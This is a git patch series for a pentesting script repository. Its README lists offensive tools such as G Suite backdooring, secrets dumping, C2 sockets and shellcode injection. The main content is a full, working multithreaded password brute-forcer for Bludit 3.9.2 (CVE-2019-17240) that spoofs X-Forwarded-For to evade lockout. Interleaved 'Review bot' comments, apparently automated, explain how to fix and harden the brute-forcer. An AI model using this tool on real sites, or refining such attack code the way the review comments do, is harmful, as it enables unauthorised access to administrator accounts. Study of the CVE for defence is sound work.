From d3dac308937a2661794c77fac3dd0f457e8b5df6 Mon Sep 17 00:00:00 2001 From: zweilosec Date: Thu, 18 Jun 2020 16:29:04 +0000 Subject: [PATCH 1/3] GitBook: [master] 2 pages modified --- README.md | 84 ++++++++++++++++++++++++++++-------------------------- SUMMARY.md | 4 +++ 2 files changed, 48 insertions(+), 40 deletions(-) create mode 100644 SUMMARY.md diff --git a/README.md b/README.md index 46b2256..80a40ef 100644 --- a/README.md +++ b/README.md 
@@ -1,40 +1,44 @@ -Python for Pentesters -================== - -## Overview ## -Getting started with Python for pentesting and red team engagements is fairly easy! This repo is just a small collection of random scripts to help get you started. - -**Brought to you by:** - -![Black Hills Information Security](https://www.blackhillsinfosec.com/wp-content/uploads/2016/03/BHIS-logo-L-300x300.png "Black Hills Information Security") - -## Examples: by Mike Felch (@ustayready) and Joff Thyer (@joff_thyer) ## -This code is provided purely for educational purposes. - - * pivot_winrm.py: shows how to use Python with winrm to execute commands on a remote machine - * cloud_aws_s3.py: search AWS S3 buckets for sensitive filenames - * cloud_aws_secrets.py: Dump all the secrets in AWS Secrets Manager - * cloud_azure_ad.py: Dumping AzureAD users - * cloud_gsuite_backdoor.py: Backdooring G Suite accounts for full access - * cloud_gsuite_email.py: Reading GMail emails - * crack_jwt.py: Cracking JSON web tokens - * live_host_discovery.py: Discovering live hosts on a network - * live_port_discovery.py: Discovering open ports on a host - * passwords_attack.py: Trying username/password combinations on a web authentication portal - * pivot_psremoting.py: Pivoting in a Windows environment using PSRemoting - * pivot_wmi.py: Pivoting in a Windows environment using WMI - * shodan_search.py: Searching for internet connected devices on Shodan - * socket_c2_client.py: C2 socket client - * socket_c2_server.py: C2 socket server - * web_brute.py: Brute forcing web paths for unknown attack surfaces - * web_robots.py: Downloading the robots.txt for URLs - * web_sniff.py: Sniffing HTTP packets - * web_spa.py: Interacting with a single page app with a headless browser then copying session cookies to the requests library - * pymeta.py: Read all files in a directory recursively and extracts metadata from any office documents, and PDFs discovered - * powerstrip.py: Strips comments out of a PowerShell 
script, and writes a file with -stripped as part of the filename - * pyinjector.py: Using ctypes to execute shellcode within the same process or inject into a remote process using thread manipulation - - - - - +--- +description: >- + A collection of python scripts collected from various sources to help in + penetration testing and Red Teams. Examples can be found in their relevant + Github accounts. +--- + +# Python for Pentesters + +## Overview \#\# + +Getting started with Python for pentesting and red team engagements is fairly easy! This repo is just a small collection of random scripts to help get you started. + +**Brought to you by:** + +![Black Hills Information Security](https://www.blackhillsinfosec.com/wp-content/uploads/2016/03/BHIS-logo-L-300x300.png) + +## Examples: by Mike Felch \(@ustayready\) and Joff Thyer \(@joff\_thyer\) \#\# + +This code is provided purely for educational purposes. + +* pivot\_winrm.py: shows how to use Python with winrm to execute commands on a remote machine +* cloud\_aws\_s3.py: search AWS S3 buckets for sensitive filenames +* cloud\_aws\_secrets.py: Dump all the secrets in AWS Secrets Manager +* cloud\_azure\_ad.py: Dumping AzureAD users +* cloud\_gsuite\_backdoor.py: Backdooring G Suite accounts for full access +* cloud\_gsuite\_email.py: Reading GMail emails +* crack\_jwt.py: Cracking JSON web tokens +* live\_host\_discovery.py: Discovering live hosts on a network +* live\_port\_discovery.py: Discovering open ports on a host +* passwords\_attack.py: Trying username/password combinations on a web authentication portal +* pivot\_psremoting.py: Pivoting in a Windows environment using PSRemoting +* pivot\_wmi.py: Pivoting in a Windows environment using WMI +* shodan\_search.py: Searching for internet connected devices on Shodan +* socket\_c2\_client.py: C2 socket client +* socket\_c2\_server.py: C2 socket server +* web\_brute.py: Brute forcing web paths for unknown attack surfaces +* web\_robots.py: Downloading the robots.txt 
for URLs +* web\_sniff.py: Sniffing HTTP packets +* web\_spa.py: Interacting with a single page app with a headless browser then copying session cookies to the requests library +* pymeta.py: Read all files in a directory recursively and extracts metadata from any office documents, and PDFs discovered +* powerstrip.py: Strips comments out of a PowerShell script, and writes a file with -stripped as part of the filename +* pyinjector.py: Using ctypes to execute shellcode within the same process or inject into a remote process using thread manipulation + diff --git a/SUMMARY.md b/SUMMARY.md new file mode 100644 index 0000000..cfbd5ed --- /dev/null +++ b/SUMMARY.md @@ -0,0 +1,4 @@ +# Table of contents + +* [Python for Pentesters](README.md) + From 848f44f776852fa84b07589ef158bcc870f0bc7d Mon Sep 17 00:00:00 2001 From: WolfZweiler <61819873+zweilosec@users.noreply.github.com> Date: Sun, 9 Aug 2020 09:12:45 -0400 Subject: [PATCH 2/3] Create bludit-3.9.2_pwd-bruteforce_multi.py Brute-force password sprayer for Bludit 3.9.2 and below. CVE-2019-17240 This script is based off the POC from https://rastating.github.io/bludit-brute-force-mitigation-bypass/ Also borrows code from https://github.com/averagesecurityguy/scripts/blob/master/bruteforce/multi_ssh.py to make it multithreaded Everything works except closing gracefully on success --- bludit-3.9.2_pwd-bruteforce_multi.py | 131 +++++++++++++++++++++++++++ 1 file changed, 131 insertions(+) create mode 100644 bludit-3.9.2_pwd-bruteforce_multi.py diff --git a/bludit-3.9.2_pwd-bruteforce_multi.py b/bludit-3.9.2_pwd-bruteforce_multi.py new file mode 100644 index 0000000..5be0c66 --- /dev/null +++ b/bludit-3.9.2_pwd-bruteforce_multi.py 
@@ -0,0 +1,131 @@ +#!/usr/bin/env python3 + +#CVE-2019-17240 +#Bludit <= 3.9.2 Admin Portal login brute-force tool +#Need valid username to use + +import multiprocessing +import sys +import time +from multiprocessing import Queue +import re +import requests + +def worker(cred_queue): + print('Starting new worker thread.') + while True: + try: + password = cred_queue.get(timeout=10) + except Queue.Empty: + return + + try: + + session = requests.Session() + login_page = session.get(login_url) + csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1) + + print('[*] Trying: {p}'.format(p = password)) + + headers = { + 'X-Forwarded-For': password, + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36', + 'Referer': login_url + } + + data = { + 'tokenCSRF': csrf_token, + 'username': username, + 'password': password, + 'save': '' + } + + login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False) + + if 'location' in login_result.headers: + if '/admin/dashboard' in login_result.headers['location']: + print() + print('SUCCESS: Password found!') + print('Use {u}:{p} to login.'.format(u = username, p = password)) + print() + break + + + except Exception: + #Make this exception more verbose and useful + e = sys.exc_info()[2] + print("Failed on: {0} {1}".format(password, str(e))) + return + + #This is useful for rate-limiting. Uncomment to use. +# time.sleep(.5) + + cleanup(procs) + sys.exit() + #For some reason I still can't get this to exit properly. 
+ #TODO: Fix this to clean up all threads and exit gracefully upon success + #below is the error output + """ + Process Process-7: + Traceback (most recent call last): + File "/usr/lib/python3.8/multiprocessing/process.py", line 315, in _bootstrap + self.run() + File "/usr/lib/python3.8/multiprocessing/process.py", line 108, in run + self._target(*self._args, **self._kwargs) + File "bludit-3.9.2-bruteForce-multi.py", line 59, in worker + cleanup(procs) + File "bludit-3.9.2-bruteForce-multi.py", line 99, in cleanup + p.join() + File "/usr/lib/python3.8/multiprocessing/process.py", line 147, in join + assert self._parent_pid == os.getpid(), 'can only join a child process' + AssertionError: can only join a child process + """ + + +def file_to_list(wList): + passlist= [] + #latin1 encoding is necessary to get `rockyou.txt` to work + #this may cause problems with other wordlists + #need to add check for encoding type on input file + with open(wList, encoding='latin1') as wordList: + templist = wordList.readlines() + + for word in templist: + passlist.append(word.strip()) + + return passlist + + +def cleanup(processes): + # Wait for all worker processes to finish + for p in processes: + p.terminate() + p.join() + + +if __name__ == '__main__': + print("#CVE-2019-17240") + print("#Bludit <= 3.9.2 Admin Portal login brute-force tool") + if len(sys.argv) != 4: + print('Usage: python3 bludit-3.9.2-bruteForce-multi.py http:// ') + sys.exit() + + host = sys.argv[1] + login_url = host + '/admin/login' + username = sys.argv[2] + wordlist = sys.argv[3] + threads = 10 + passwords = file_to_list(wordlist) + + cred_queue = multiprocessing.Queue() + procs = [] + + print('Starting {0} worker threads.'.format(threads)) + for i in range(threads): + p = multiprocessing.Process(target=worker, args=(cred_queue, )) + procs.append(p) + p.start() + + print('Loading credential queue.') + for pwd in passwords: + cred_queue.put((pwd)) 
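Review bot: in `worker`, the `except Queue.Empty:` clause names the wrong object: `Queue` here is `multiprocessing.Queue`, a factory function with no `Empty` attribute, so when `cred_queue.get(timeout=10)` times out the clause itself raises `AttributeError` and the worker dies with a traceback instead of returning. The exception `get` actually raises is `queue.Empty` from the standard `queue` module; add `import queue` and write `except queue.Empty:` (the `from multiprocessing import Queue` import is then unused and can go, as can `import time` while the sleep stays commented out). Two further points in the same function: the `except Exception:` handler reads `sys.exc_info()[2]`, which is the traceback object, so the message prints `<traceback object at ...>` rather than the error text; use `except Exception as e:` and format `e`. The graceful-exit failure recorded in the docstring follows from calling `cleanup(procs)` inside a child process: `Process.join()` asserts that the caller is the parent, which is exactly the `can only join a child process` error shown. The usual fix is to pass a shared `multiprocessing.Event` to each worker alongside `cred_queue`, have the worker set it and `return` on success, and let the `__main__` block wait on that event (or on queue exhaustion) and call `cleanup(procs)` itself. Passing those arguments explicitly also removes the reliance on `login_url`, `username` and `procs` being module globals inherited through fork, which breaks under the spawn start method (Windows, and macOS on Python 3.8+), where those names are undefined in the child. Finally, the usage string names the script `bludit-3.9.2-bruteForce-multi.py` while the file added is `bludit-3.9.2_pwd-bruteforce_multi.py`; keep the two consistent.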
From 18e0cb3a8d4604243a2d1c1f737178b110430433 Mon Sep 17 00:00:00 2001 From: WolfZweiler <61819873+zweilosec@users.noreply.github.com> Date: Sun, 9 Aug 2020 09:22:18 -0400 Subject: [PATCH 3/3] Update and reorg Reorganized to reflect I will be adding my own code to this repo Added bludit-bruteforce tool --- README.md | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 80a40ef..c385739 100644 --- a/README.md +++ b/README.md @@ -9,15 +9,18 @@ description: >- ## Overview \#\# -Getting started with Python for pentesting and red team engagements is fairly easy! This repo is just a small collection of random scripts to help get you started. +Getting started with Python for pentesting and red team engagements is fairly easy! This repo is just a small collection of random scripts from various sources. -**Brought to you by:** +This code is provided purely for educational purposes. All responsibility for any potential damage or unethical/illegal behavior is solely on the user. -![Black Hills Information Security](https://www.blackhillsinfosec.com/wp-content/uploads/2016/03/BHIS-logo-L-300x300.png) +# My scripts +* bludit-3.9.2_pwd-bruteforce_multi.py: Multithreaded password brute-force tool to get valid password for exploiting CVE-2019-17240 + +# Scripts from other sources -## Examples: by Mike Felch \(@ustayready\) and Joff Thyer \(@joff\_thyer\) \#\# +**Many scripts written by: Mike Felch \(@ustayready\) and Joff Thyer \(@joff\_thyer\) of:** -This code is provided purely for educational purposes. +![Black Hills Information Security](https://www.blackhillsinfosec.com/wp-content/uploads/2016/03/BHIS-logo-L-300x300.png) * pivot\_winrm.py: shows how to use Python with winrm to execute commands on a remote machine * cloud\_aws\_s3.py: search AWS S3 buckets for sensitive filenames
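Review bot: the two new headings `# My scripts` and `# Scripts from other sources` are level-1 (`#`), the same level as the page title `# Python for Pentesters` added in the previous commit, while the sibling section `## Overview \#\#` is level-2, so GitBook's table of contents will list them as peers of the title rather than sections under it; make them `## My scripts` and `## Scripts from other sources`. The context line `## Overview \#\#` also shows that the GitBook conversion escaped the original closing ATX hashes to `\#\#`, which render as a literal `##` after the heading text; drop that trailing `\#\#` while editing this region. The bullet `* bludit-3.9.2_pwd-bruteforce_multi.py: ...` follows `# My scripts` with no blank line between heading and list, unlike the other list in the file; add one for consistency.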